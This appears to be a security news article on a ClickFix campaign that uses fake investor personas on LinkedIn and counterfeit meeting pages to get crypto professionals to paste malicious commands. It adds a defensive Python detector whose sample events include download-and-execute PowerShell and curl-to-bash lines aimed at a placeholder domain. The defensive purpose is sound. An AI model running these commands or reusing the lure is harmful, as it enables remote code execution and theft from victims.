ClickFix Campaign Exploits Fake Venture Capitalists on LinkedIn to Target Crypto and Web3 Professionals
A sophisticated cyberattack campaign has emerged, targeting professionals in the cryptocurrency and Web3 sectors through a combination of social engineering, fabricated venture capital identities, and deceptive video conferencing links. First identified in early 2026, this operation employs a technique known as ClickFix to manipulate victims into executing malicious commands on their own devices, effectively making them unwitting participants in their own compromise.
The Attack Sequence
The campaign initiates on LinkedIn, where attackers assume the persona of Mykhailo Hureiev, who presents himself as the Co-Founder and Managing Partner of a fictitious investment firm named SolidBit Capital. Engaging with targets by referencing their public work in cryptocurrency or decentralized finance (DeFi) communities, the attacker builds a facade of trust. The conversation then shifts towards scheduling a call, during which the victim is provided with a Calendly link that surreptitiously redirects them to a counterfeit Zoom meeting page designed to deploy malware.
Infrastructure and Fake Identities
Analysts from Moonlock have traced the infrastructure supporting this campaign to a single registrant: Anatolli Bigdasch, purportedly located in Boston, Massachusetts, using the email address anatollibigdasch0717[at]gmail[.]com. Beyond SolidBit Capital, researchers uncovered additional fictitious company fronts—MegaBit and Lumax Capital—each featuring polished websites, AI-generated team headshots, and fabricated company histories. Notably, the domain lumax[.]capital was registered on February 2, 2026, indicating that the threat actors are preparing to deploy new identities as existing ones become exposed.
Cross-Platform Payloads
This campaign is notable for delivering payloads compatible with both macOS and Windows operating systems. On January 9, 2026, a victim using the X handle @0xbigdan shared screenshots of the entire interaction, highlighting key red flags—such as Hureiev joining a legitimate Google Meet session, remaining completely silent, and abruptly disconnecting when the victim expressed skepticism.
Operational Patterns and Attribution
The operational patterns of this campaign closely mirror activities previously attributed to UNC1069, a threat actor with suspected connections to North Korea, tracked since 2018. However, definitive attribution in this instance remains open.
The ClickFix Delivery Mechanism
The ClickFix technique is central to this campaign’s success. When a victim clicks on the fraudulent Zoom or Google Meet link, they are directed to a page that closely resembles legitimate platforms—such as The Digital Asset Conference III or a typosquatted version of Hedgeweek, a genuine hedge fund publication. Overlaid on this page is a counterfeit Cloudflare “I’m not a robot” verification box, constructed entirely from local HTML and CSS, with no actual connection to Cloudflare’s infrastructure.
Upon clicking the checkbox, JavaScript silently writes a malicious command to the user’s clipboard via `navigator.clipboard.writeText()`. The script detects the browser’s User-Agent string to identify the operating system and serves the corresponding payload.
– For Windows Users: The clipboard receives a PowerShell command that conceals its window, bypasses execution policies, and utilizes Invoke-Expression to run a remote script in memory—leaving no trace on disk for antivirus software to detect.
– For macOS Users: A bash one-liner installs Homebrew if Python 3 is absent, downloads a Python script from the command-and-control server at hedgeweeks[.]online, and executes it with `nohup bash` to keep the process running even after the terminal is closed.
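As an added illustration, not taken from Moonlock’s report or from any tool named in this article, the following Python sketches how a defender could triage process-creation command lines for the two payload behaviours just described (hidden-window PowerShell with policy bypass and in-memory Invoke-Expression on Windows; Homebrew bootstrap, remote fetch and nohup-detached Python on macOS). The hosts, domains and sample command lines are constructed for the example.

```python
import re

# Behaviours of the two ClickFix payloads described above, expressed as
# case-insensitive regexes over a process command line.
WINDOWS_INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "invoke_expression": r"\b(?:invoke-expression|iex)\b",
    "remote_fetch": r"\b(?:invoke-restmethod|irm|invoke-webrequest|iwr|downloadstring)\b",
}
MACOS_INDICATORS = {
    "homebrew_bootstrap": r"install\.sh|\bbrew\s+install\b",
    "remote_fetch": r"\bcurl\b|\bwget\b",
    "nohup_detach": r"\bnohup\s+bash\b",
    "python_launch": r"\bpython3?\b",
}
# One match on its own (an admin's "-ExecutionPolicy Bypass -File ...") is routine;
# three or more of one platform's behaviours on a single command line is not.
THRESHOLD = 3

def _matches(cmd, indicators):
    return [name for name, pattern in indicators.items() if re.search(pattern, cmd, re.I)]

def score_command(cmd: str) -> dict:
    """Return the better-matching platform, its matched indicators and a verdict."""
    win, mac = _matches(cmd, WINDOWS_INDICATORS), _matches(cmd, MACOS_INDICATORS)
    platform, hits = ("windows", win) if len(win) >= len(mac) else ("macos", mac)
    return {"platform": platform, "indicators": hits, "suspicious": len(hits) >= THRESHOLD}

# Constructed process-creation events (hypothetical hosts, example.invalid domains);
# none of these lines were captured from the campaign.
SAMPLE_EVENTS = [
    ("win-01", 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/s.ps1)"'),
    ("mac-01", "bash -c 'command -v python3 || curl -fsSL https://example.invalid/install.sh | bash; "
               "curl -fsSL https://example.invalid/u.py -o /tmp/u.py; nohup bash -c \"python3 /tmp/u.py\" &'"),
    ("win-02", "powershell -ExecutionPolicy Bypass -File C:\\ops\\deploy.ps1"),
    ("mac-02", "curl -fsSL https://example.invalid/report.json -o report.json"),
]

def triage(events=SAMPLE_EVENTS):
    """Map host -> verdict for every event; only the two ClickFix-style lines should fire."""
    return {host: score_command(cmd) for host, cmd in events}

if __name__ == "__main__":
    for host, result in triage().items():
        flag = "ALERT" if result["suspicious"] else "ok   "
        print(f"{flag} {host} {result['platform']} {result['indicators']}")
```

In a real deployment the same scoring would run over endpoint telemetry (for example process-creation events), with the parent process recorded so that a shell spawned straight from a paste into the Run dialog or Terminal can be weighted higher than one launched by a deployment tool.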
Implications and Recommendations
This campaign underscores the evolving sophistication of social engineering attacks targeting the cryptocurrency and Web3 sectors. By leveraging professional networking platforms like LinkedIn and exploiting the trust associated with venture capital firms, attackers can effectively deceive even the most vigilant individuals.
To mitigate the risk of such attacks, professionals in these industries should:
1. Verify Identities: Conduct thorough due diligence when approached by individuals claiming to represent investment firms. Cross-reference their information with official company websites and reputable sources.
2. Scrutinize Communication Channels: Be cautious of unsolicited meeting invitations and verify the authenticity of scheduling links.
3. Exercise Caution with Clipboard Activity: Be wary of prompts to copy and paste commands into your terminal or command prompt, especially from unverified sources.
4. Implement Security Measures: Utilize endpoint protection solutions capable of detecting and preventing the execution of unauthorized scripts and commands.
5. Stay Informed: Keep abreast of emerging threats and tactics employed by cybercriminals targeting the cryptocurrency and Web3 sectors.
By adopting these practices, professionals can enhance their resilience against sophisticated social engineering attacks and protect their assets and information from malicious actors.